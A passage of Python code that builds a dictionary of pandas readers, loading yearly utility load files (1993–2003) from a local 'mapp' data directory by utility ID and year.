1995 : pd.read_fwf('%s/mapp/1995/IPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9438 : {
1993 : pd.read_fwf('%s/mapp/1993/IIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/IIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
11018 : {
1993 : pd.read_fwf('%s/mapp/1993/LES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/LES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/LES95' % (fulldir)).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/LES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/LES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/LES98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/LES99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_excel('%s/mapp/2000/LES00' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/mapp/2001/LES01' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/LES02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/LES03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12647 : {
1995 : pd.read_fwf('%s/mapp/1995/MPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/MPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
12658 : {
1993 : pd.read_fwf('%s/mapp/1993/MPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12819 : {
1993 : pd.read_fwf('%s/mapp/1993/MDU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MDU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MDU95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MDU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MDU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MDU98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MDU99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MDU02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MDU03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
21352 : {
1993 : pd.read_fwf('%s/mapp/1993/MEAN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MEAN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEAN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEAN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MEAN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEAN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEAN02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEAN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13143 : {
1993 : pd.read_fwf('%s/mapp/1993/MPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPW99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPW02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPW03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13337 : {
1993 : pd.read_fwf('%s/mapp/1993/NPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NPPD95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/NPPD00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/NPPD01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_csv('%s/mapp/2002/NPPD02' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13781 : {
1993 : pd.read_fwf('%s/mapp/1993/NSP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NSP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NSP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NSP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NSP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NSP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/NSP00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=2, header=None, skipfooter=1)[2].values
},
13809 : {
1993 : pd.read_fwf('%s/mapp/1993/NWPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NWPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NWPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NWPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NWPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NWPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/NWPS02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NWPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14127 : {
1993 : pd.read_fwf('%s/mapp/1993/OPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OPPD95' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 7:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OPPD02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
14232 : {
1993 : pd.read_fwf('%s/mapp/1993/OTP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OTP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OTP95' % (fulldir), header=None).iloc[:, -2].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OTP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OTP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OTP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OTP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/OTP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OTP02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OTP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
40580 : {
1993 : pd.read_fwf('%s/mapp/1993/SMMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/SMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/SMMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/SMMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/SMMP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/SMMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/SMMP00' % (fulldir)).iloc[:-1, 3].values,
2001 : pd.read_csv('%s/mapp/2001/SMMP01' % (fulldir), header=None).iloc[:, 2].values,
2002 : pd.read_fwf('%s/mapp/2002/SMMPA02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/SMMPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
19514 : {
1993 : pd.read_fwf('%s/mapp/1993/UPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/UPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/UPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/UPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/UPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
20858 : {
1993 : pd.read_fwf('%s/mapp/1993/WPPI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/WPPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/WPPI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_csv('%s/mapp/1997/WPPI97' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:-1].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/WPPI98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/WPPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/WPPI02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/WPPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
12341 : {
1995 : pd.read_fwf('%s/mapp/1995/MEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEC_ALL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
23333 : {
1993 : pd.read_fwf('%s/mapp/1993/MPSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
